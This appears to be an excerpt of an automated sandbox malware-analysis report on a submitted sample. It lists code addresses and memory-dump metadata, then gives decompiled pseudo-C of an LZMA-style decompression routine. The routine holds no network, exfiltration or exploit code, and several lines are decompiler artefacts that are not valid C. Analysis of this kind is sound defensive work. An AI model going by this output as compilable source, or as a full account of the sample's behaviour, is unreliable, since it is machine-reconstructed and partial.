                                                0x00406f16
                                                0x00406f23
                                                0x00406f26
                                                0x00406f26
                                                0x00000000
                                                0x00000000
                                                0x00406f4a
                                                0x00406f4e
                                                0x00000000
                                                0x00000000
                                                0x00406f54
                                                0x00406f58
                                                0x00000000
                                                0x00000000
                                                0x00406f5e
                                                0x00406f60
                                                0x00406f64
                                                0x00406f64
                                                0x00406f67
                                                0x00406f6b
                                                0x00000000
                                                0x00000000
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fc6
                                                0x00406fc9
                                                0x00406fcc
                                                0x00406fd6
                                                0x00000000
                                                0x00406fd6
                                                0x00406fc1
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00406ffc
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00407005
                                                0x00407005
                                                0x00407008
                                                0x0040700f
                                                0x00407014
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00406ef5
                                                0x00406ef5
                                                0x00406ef8
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00000000
                                                0x00407321
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e5
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x00000000
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00407033
                                                0x00407036
                                                0x00407039
                                                0x0040703b
                                                0x0040703d
                                                0x0040703d
                                                0x0040703e
                                                0x00407041
                                                0x00407048
                                                0x0040704b
                                                0x00407059
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00000000
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00407484
                                                0x0040748a
                                                0x0040748c
                                                0x00407493
                                                0x00407495
                                                0x0040749c
                                                0x004074a0
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000
                                                0x00407499
                                                0x004072e6
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x004073c3
                                                0x00000000
                                                0x00407238

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                                                • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406F4A() {
                                                				unsigned short _t532;
                                                				signed int _t533;
                                                				void _t534;
                                                				void* _t535;
                                                				signed int _t536;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t589;
                                                				signed int* _t606;
                                                				void* _t613;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t613 - 0x40) != 0) {
                                                						L89:
                                                						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                						L69:
                                                						_t606 =  *(_t613 - 0x58);
                                                						 *(_t613 - 0x84) = 0x12;
                                                						L132:
                                                						 *(_t613 - 0x54) = _t606;
                                                						L133:
                                                						_t532 =  *_t606;
                                                						_t589 = _t532 & 0x0000ffff;
                                                						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                						if( *(_t613 - 0xc) >= _t565) {
                                                							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                							 *(_t613 - 0x40) = 1;
                                                							_t533 = _t532 - (_t532 >> 5);
                                                							 *_t606 = _t533;
                                                						} else {
                                                							 *(_t613 - 0x10) = _t565;
                                                							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                						}
                                                						if( *(_t613 - 0x10) >= 0x1000000) {
                                                							L139:
                                                							_t534 =  *(_t613 - 0x84);
                                                							L140:
                                                							 *(_t613 - 0x88) = _t534;
                                                							goto L1;
                                                						} else {
                                                							L137:
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 5;
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                							goto L139;
                                                						}
                                                					} else {
                                                						if( *(__ebp - 0x60) == 0) {
                                                							L171:
                                                							_t536 = _t535 | 0xffffffff;
                                                							L172:
                                                							return _t536;
                                                						}
                                                						__eax = 0;
                                                						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                						0 | _t258 = _t258 + _t258 + 9;
                                                						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                						L75:
                                                						if( *(__ebp - 0x64) == 0) {
                                                							 *(__ebp - 0x88) = 0x1b;
                                                							L170:
                                                							_t568 = 0x22;
                                                							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                							_t536 = 0;
                                                							goto L172;
                                                						}
                                                						__eax =  *(__ebp - 0x14);
                                                						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                						if(__eax >=  *(__ebp - 0x74)) {
                                                							__eax = __eax +  *(__ebp - 0x74);
                                                						}
                                                						__edx =  *(__ebp - 8);
                                                						__cl =  *(__eax + __edx);
                                                						__eax =  *(__ebp - 0x14);
                                                						 *(__ebp - 0x5c) = __cl;
                                                						 *(__eax + __edx) = __cl;
                                                						__eax = __eax + 1;
                                                						__edx = 0;
                                                						_t274 = __eax %  *(__ebp - 0x74);
                                                						__eax = __eax /  *(__ebp - 0x74);
                                                						__edx = _t274;
                                                						__eax =  *(__ebp - 0x68);
                                                						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                						_t283 = __ebp - 0x64;
                                                						 *_t283 =  *(__ebp - 0x64) - 1;
                                                						 *( *(__ebp - 0x68)) = __cl;
                                                						L79:
                                                						 *(__ebp - 0x14) = __edx;
                                                						L80:
                                                						 *(__ebp - 0x88) = 2;
                                                					}
                                                					L1:
                                                					_t535 =  *(_t613 - 0x88);
                                                					if(_t535 > 0x1c) {
                                                						goto L171;
                                                					}
                                                					switch( *((intOrPtr*)(_t535 * 4 +  &M004074A1))) {
                                                						case 0:
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							_t535 =  *( *(_t613 - 0x70));
                                                							if(_t535 > 0xe1) {
                                                								goto L171;
                                                							}
                                                							_t539 = _t535 & 0x000000ff;
                                                							_push(0x2d);
                                                							asm("cdq");
                                                							_pop(_t570);
                                                							_push(9);
                                                							_pop(_t571);
                                                							_t609 = _t539 / _t570;
                                                							_t541 = _t539 % _t570 & 0x000000ff;
                                                							asm("cdq");
                                                							_t604 = _t541 % _t571 & 0x000000ff;
                                                							 *(_t613 - 0x3c) = _t604;
                                                							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                								L10:
                                                								if(_t612 == 0) {
                                                									L12:
                                                									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                									goto L15;
                                                								} else {
                                                									goto L11;
                                                								}
                                                								do {
                                                									L11:
                                                									_t612 = _t612 - 1;
                                                									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                								} while (_t612 != 0);
                                                								goto L12;
                                                							}
                                                							if( *(_t613 - 4) != 0) {
                                                								GlobalFree( *(_t613 - 4)); // executed
                                                							}
                                                							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                							 *(_t613 - 4) = _t535;
                                                							if(_t535 == 0) {
                                                								goto L171;
                                                							} else {
                                                								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                								goto L10;
                                                							}
                                                						case 1:
                                                							L13:
                                                							__eflags =  *(_t613 - 0x6c);
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 1;
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							_t45 = _t613 - 0x48;
                                                							 *_t45 =  *(_t613 - 0x48) + 1;
                                                							__eflags =  *_t45;
                                                							L15:
                                                							if( *(_t613 - 0x48) < 4) {
                                                								goto L13;
                                                							}
                                                							_t547 =  *(_t613 - 0x40);
                                                							if(_t547 ==  *(_t613 - 0x74)) {
                                                								L20:
                                                								 *(_t613 - 0x48) = 5;
                                                								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                								goto L23;
                                                							}
                                                							 *(_t613 - 0x74) = _t547;
                                                							if( *(_t613 - 8) != 0) {
                                                								GlobalFree( *(_t613 - 8)); // executed
                                                							}
                                                							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                							 *(_t613 - 8) = _t535;
                                                							if(_t535 == 0) {
                                                								goto L171;
                                                							} else {
                                                								goto L20;
                                                							}
                                                						case 2:
                                                							L24:
                                                							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                							 *(_t613 - 0x84) = 6;
                                                							 *(_t613 - 0x4c) = _t554;
                                                							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                							goto L132;
                                                						case 3:
                                                							L21:
                                                							__eflags =  *(_t613 - 0x6c);
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 3;
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							_t67 = _t613 - 0x70;
                                                							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                							__eflags =  *_t67;
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                							L23:
                                                							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                							if( *(_t613 - 0x48) != 0) {
                                                								goto L21;
                                                							}
                                                							goto L24;
                                                						case 4:
                                                							goto L133;
                                                						case 5:
                                                							goto L137;
                                                						case 6:
                                                							__edx = 0;
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x34) = 1;
                                                								 *(__ebp - 0x84) = 7;
                                                								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                							__esi =  *(__ebp - 0x60);
                                                							__cl = 8;
                                                							__cl = 8 -  *(__ebp - 0x3c);
                                                							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                							__ecx =  *(__ebp - 0x3c);
                                                							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                							__ecx =  *(__ebp - 4);
                                                							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                							__eflags =  *(__ebp - 0x38) - 4;
                                                							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                							if( *(__ebp - 0x38) >= 4) {
                                                								__eflags =  *(__ebp - 0x38) - 0xa;
                                                								if( *(__ebp - 0x38) >= 0xa) {
                                                									_t98 = __ebp - 0x38;
                                                									 *_t98 =  *(__ebp - 0x38) - 6;
                                                									__eflags =  *_t98;
                                                								} else {
                                                									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                								}
                                                							} else {
                                                								 *(__ebp - 0x38) = 0;
                                                							}
                                                							__eflags =  *(__ebp - 0x34) - __edx;
                                                							if( *(__ebp - 0x34) == __edx) {
                                                								__ebx = 0;
                                                								__ebx = 1;
                                                								goto L61;
                                                							} else {
                                                								__eax =  *(__ebp - 0x14);
                                                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                								__eflags = __eax -  *(__ebp - 0x74);
                                                								if(__eax >=  *(__ebp - 0x74)) {
                                                									__eax = __eax +  *(__ebp - 0x74);
                                                									__eflags = __eax;
                                                								}
                                                								__ecx =  *(__ebp - 8);
                                                								__ebx = 0;
                                                								__ebx = 1;
                                                								__al =  *((intOrPtr*)(__eax + __ecx));
                                                								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                								goto L41;
                                                							}
                                                						case 7:
                                                							__eflags =  *(__ebp - 0x40) - 1;
                                                							if( *(__ebp - 0x40) != 1) {
                                                								__eax =  *(__ebp - 0x24);
                                                								 *(__ebp - 0x80) = 0x16;
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x28);
                                                								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                								__eax =  *(__ebp - 0x2c);
                                                								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                								__eax = 0;
                                                								__eflags =  *(__ebp - 0x38) - 7;
                                                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                								__al = __al & 0x000000fd;
                                                								__eax = (__eflags >= 0) - 1 + 0xa;
                                                								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                								__eax =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 4) + 0x664;
                                                								__eflags = __eax;
                                                								 *(__ebp - 0x58) = __eax;
                                                								goto L69;
                                                							}
                                                							__eax =  *(__ebp - 4);
                                                							__ecx =  *(__ebp - 0x38);
                                                							 *(__ebp - 0x84) = 8;
                                                							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                							goto L132;
                                                						case 8:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xa;
                                                								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                							} else {
                                                								__eax =  *(__ebp - 0x38);
                                                								__ecx =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 0x38) + 0xf;
                                                								 *(__ebp - 0x84) = 9;
                                                								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                							}
                                                							goto L132;
                                                						case 9:
                                                							goto L0;
                                                						case 0xa:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xb;
                                                								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x28);
                                                							goto L88;
                                                						case 0xb:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__ecx =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x20);
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                							} else {
                                                								__eax =  *(__ebp - 0x24);
                                                							}
                                                							__ecx =  *(__ebp - 0x28);
                                                							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                							L88:
                                                							__ecx =  *(__ebp - 0x2c);
                                                							 *(__ebp - 0x2c) = __eax;
                                                							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                							goto L89;
                                                						case 0xc:
                                                							L99:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xc;
                                                								goto L170;
                                                							}
